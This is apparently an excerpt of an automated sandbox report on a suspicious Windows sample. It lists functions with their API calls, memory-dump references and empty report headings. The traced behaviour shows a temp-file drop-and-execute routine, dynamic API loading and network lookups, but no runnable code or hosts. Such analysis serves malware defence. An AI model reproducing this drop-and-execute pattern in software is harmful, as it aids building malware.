Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E015
Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E022
Part of subcall function 0017DF60: ??2@YAPAXI@Z.MSVCRT ref: 0017E0F5
Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E149
Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E153
Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E15D

Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 00174028
Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 0017403D
Part of subcall function 00173F10: _wtoi.MSVCRT ref: 001740EE
Part of subcall function 00173F10: rand.MSVCRT ref: 00174160
Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 0017430F
Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 0017431D

SysFreeString.OLEAUT32(?), ref: 0017AD69

Strings

run, xrefs: 0017AD0F
mcco, xrefs: 0017AC86

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00182650, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52process

APIs

memset.MSVCRT ref: 0018265F
CreateProcessA.KERNEL32(00000000,00182798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 00182698
WaitForSingleObject.KERNEL32(?,00002710), ref: 001826AE
CloseHandle.KERNEL32(?), ref: 001826BE
CloseHandle.KERNEL32(?), ref: 001826C4

Strings

qega, xrefs: 00182656
D, xrefs: 0018268A

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017DF60, Relevance: 10.7, APIs: 7, Instructions: 204

APIs

Part of subcall function 00173350: ??3@YAXPAX@Z.MSVCRT ref: 00173371

SysFreeString.OLEAUT32(?), ref: 0017E008
SysFreeString.OLEAUT32(?), ref: 0017E015
SysFreeString.OLEAUT32(?), ref: 0017E022

Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B318
Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B321

??2@YAPAXI@Z.MSVCRT ref: 0017E0F5

Part of subcall function 00180C60: ??2@YAPAXI@Z.MSVCRT ref: 00180C8F

Part of subcall function 00172200: SysAllocString.OLEAUT32(?), ref: 00172211
Part of subcall function 00172200: SysAllocString.OLEAUT32(?), ref: 00172219

SysFreeString.OLEAUT32(?), ref: 0017E149
SysFreeString.OLEAUT32(?), ref: 0017E153
SysFreeString.OLEAUT32(?), ref: 0017E15D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00173F10, Relevance: 9.4, APIs: 6, Instructions: 384

APIs

SysFreeString.OLEAUT32(?), ref: 00174028
SysFreeString.OLEAUT32(?), ref: 0017403D
_wtoi.MSVCRT ref: 001740EE
rand.MSVCRT ref: 00174160

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

SysFreeString.OLEAUT32(?), ref: 0017430F
SysFreeString.OLEAUT32(?), ref: 0017431D

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017C060, Relevance: 9.3, APIs: 6, Instructions: 336

APIs

SysFreeString.OLEAUT32(?), ref: 0017C149
SysFreeString.OLEAUT32(?), ref: 0017C15E
_wtoi.MSVCRT ref: 0017C215
rand.MSVCRT ref: 0017C260

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

SysFreeString.OLEAUT32(?), ref: 0017C3AE
SysFreeString.OLEAUT32(?), ref: 0017C3BC

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00182BC0, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

??2@YAPAXI@Z.MSVCRT ref: 00182C56
??2@YAPAXI@Z.MSVCRT ref: 00182C90
??2@YAPAXI@Z.MSVCRT ref: 00182CDB
??3@YAXPAX@Z.MSVCRT ref: 00182D9E

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

??3@YAXPAX@Z.MSVCRT ref: 00182D75
??3@YAXPAX@Z.MSVCRT ref: 00182D8A

Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01

Part of subcall function 00171F50: memcpy.MSVCRT ref: 00171FEC

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001826D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66

APIs

memset.MSVCRT ref: 001826EC
GetTempPathA.KERNEL32(00000104,?), ref: 00182700

Part of subcall function 00182600: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 0018261A
Part of subcall function 00182600: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00182631
Part of subcall function 00182600: CloseHandle.KERNEL32(00000000), ref: 00182638

Part of subcall function 00182650: memset.MSVCRT ref: 0018265F
Part of subcall function 00182650: CreateProcessA.KERNEL32(00000000,00182798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 00182698
Part of subcall function 00182650: WaitForSingleObject.KERNEL32(?,00002710), ref: 001826AE
Part of subcall function 00182650: CloseHandle.KERNEL32(?), ref: 001826BE
Part of subcall function 00182650: CloseHandle.KERNEL32(?), ref: 001826C4

DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 0018279F

Strings

regi, xrefs: 00182788, 00182790
qega, xrefs: 00182753, 00182759

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00178390, Relevance: 7.8, APIs: 5, Instructions: 285

APIs

SysFreeString.OLEAUT32(?), ref: 0017840C
SysAllocString.OLEAUT32(?), ref: 00178561

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

SysFreeString.OLEAUT32(?), ref: 0017841D

Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 001731A8
Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 001731BD
Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 00173320
Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 0017332E

Part of subcall function 00172300: SysFreeString.OLEAUT32(?), ref: 001723B8
Part of subcall function 00172300: SysFreeString.OLEAUT32(?), ref: 001724BB

Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 0017551E
Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 0017552F
Part of subcall function 00175460: _wtoi.MSVCRT ref: 0017563B
Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 00175685
Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 00175693

SysFreeString.OLEAUT32(?), ref: 0017867C
SysFreeString.OLEAUT32(?), ref: 0017868A

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00175460, Relevance: 7.7, APIs: 5, Instructions: 213

APIs

Part of subcall function 001752C0: SysFreeString.OLEAUT32(00000000), ref: 001752D7
Part of subcall function 001752C0: SysFreeString.OLEAUT32(00000001), ref: 001752E5

SysFreeString.OLEAUT32(?), ref: 0017551E
SysFreeString.OLEAUT32(?), ref: 0017552F

Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B318
Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B321

_wtoi.MSVCRT ref: 0017563B
SysFreeString.OLEAUT32(?), ref: 00175685
SysFreeString.OLEAUT32(?), ref: 00175693

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00179E60, Relevance: 7.7, APIs: 5, Instructions: 191

APIs

SysFreeString.OLEAUT32(?), ref: 00179F28
SysFreeString.OLEAUT32(?), ref: 00179F39
_wtoi.MSVCRT ref: 00179FA5

Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C149
Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C15E
Part of subcall function 0017C060: _wtoi.MSVCRT ref: 0017C215
Part of subcall function 0017C060: rand.MSVCRT ref: 0017C260
Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C3AE
Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C3BC

SysFreeString.OLEAUT32(?), ref: 0017A036
SysFreeString.OLEAUT32(?), ref: 0017A044

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001729C0, Relevance: 7.7, APIs: 5, Instructions: 170

APIs

SysFreeString.OLEAUT32(?), ref: 00172A8D
SysFreeString.OLEAUT32(?), ref: 00172A97
_wtoi.MSVCRT ref: 00172B01
SysFreeString.OLEAUT32(?), ref: 00172B4E
SysFreeString.OLEAUT32(?), ref: 00172B58

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00179AB0, Relevance: 7.6, APIs: 5, Instructions: 143network

APIs

WSAStartup.WS2_32(00000202,?), ref: 00179ADA
freeaddrinfo.WS2_32(00000000,0018043A), ref: 00179B3B

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

getaddrinfo.WS2_32(0018043A,00000000,?,00000000), ref: 00179BD6
freeaddrinfo.WS2_32(00000000), ref: 00179C1E
WSACleanup.WS2_32 ref: 00179C44

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001814C0, Relevance: 7.6, APIs: 5, Instructions: 74network

APIs

WSAStartup.WS2_32(00000202,?), ref: 001814E2
gethostname.WS2_32(?,000000FF), ref: 00181502
getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 00181522
freeaddrinfo.WS2_32(00000000), ref: 00181580
WSACleanup.WS2_32 ref: 00181586

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001771D1, Relevance: 7.5, APIs: 5, Instructions: 49timethread

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177208
GetCurrentProcessId.KERNEL32 ref: 00177214
GetCurrentThreadId.KERNEL32 ref: 0017721C
GetTickCount.KERNEL32 ref: 00177224
QueryPerformanceCounter.KERNEL32(?), ref: 00177230

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00174C40, Relevance: 6.3, APIs: 4, Instructions: 279sleep

APIs

Part of subcall function 0017E7A0: CoCreateInstance.OLE32(00184254,00000000,00000001,00184264,00000000,00176AB4,?,00000000), ref: 0017E7DC

_time64.MSVCRT ref: 00174D6F
_time64.MSVCRT ref: 00174DAB

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

Sleep.KERNEL32(00001388), ref: 00174E40

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

_time64.MSVCRT ref: 00174EF8

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00173150, Relevance: 6.2, APIs: 4, Instructions: 154

APIs

Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B318
Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B321

SysFreeString.OLEAUT32(?), ref: 001731A8
SysFreeString.OLEAUT32(?), ref: 001731BD

Part of subcall function 00180DF0: SysAllocString.OLEAUT32(?), ref: 00180E03

Part of subcall function 0017F560: SysAllocString.OLEAUT32(?), ref: 0017F574

SysFreeString.OLEAUT32(?), ref: 00173320
SysFreeString.OLEAUT32(?), ref: 0017332E

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00172030, Relevance: 6.2, APIs: 4, Instructions: 154

APIs

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

??2@YAPAXI@Z.MSVCRT ref: 0017207A
??3@YAXPAX@Z.MSVCRT ref: 001721CF

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

??3@YAXPAX@Z.MSVCRT ref: 00172176
_time64.MSVCRT ref: 001721A8

Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00180D10, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 0017C8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0017C938

_time64.MSVCRT ref: 00180D4F

Part of subcall function 00171C30: ??2@YAPAXI@Z.MSVCRT ref: 00171C52
Part of subcall function 00171C30: ??3@YAXPAX@Z.MSVCRT ref: 00171C9A

Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C

??3@YAXPAX@Z.MSVCRT ref: 00180D82

Part of subcall function 0017F0B0: ??2@YAPAXI@Z.MSVCRT ref: 0017F1C7
Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F206
Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F29B

_time64.MSVCRT ref: 00180D9D
??3@YAXPAX@Z.MSVCRT ref: 00180DCC

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00182AD0, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

??2@YAPAXI@Z.MSVCRT ref: 00182ADD
??3@YAXPAX@Z.MSVCRT ref: 00182B54
_time64.MSVCRT ref: 00182B82

Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01

??3@YAXPAX@Z.MSVCRT ref: 00182BAA

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00183754, Relevance: 6.0, APIs: 4, Instructions: 49

APIs

Part of subcall function 0017995A: GetModuleHandleA.KERNEL32(00000000), ref: 00179961

__set_app_type.MSVCRT ref: 001837C0
__p__fmode.MSVCRT ref: 001837D6
__p__commode.MSVCRT ref: 001837E4
__setusermatherr.MSVCRT ref: 00183805

Part of subcall function 00171401: _controlfp.MSVCRT ref: 0017140B

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00177CF0, Relevance: 6.0, APIs: 4, Instructions: 31

APIs

InterlockedDecrement.KERNEL32(?), ref: 00177CFE
SysFreeString.OLEAUT32(00000000), ref: 00177D13
??_V@YAXPAX@Z.MSVCRT ref: 00177D21
??3@YAXPAX@Z.MSVCRT ref: 00177D2A

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Analysis Process: svchost.exe PID: 3144 Parent PID: 3060

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00060000, Relevance: 1.6, APIs: 1, Instructions: 144
library

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?), ref: 00060042

Memory Dump Source

Source File: 00000017.00000002.10780959462.00060000.00000040.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_60000_svchost.jbxd

Non-executed Functions

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Exploits:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Software Vulnerabilities:

Networking:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Public

Private

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

IRP Handler

New Device

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 001EFE30, Relevance: 25.2, APIs: 12, Strings: 2, Instructions: 661
sleep

Function 001EEDA0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197
library

Function 001F1F60, Relevance: 12.1, APIs: 8, Instructions: 98
library

Function 00415D50, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 505
librarynative

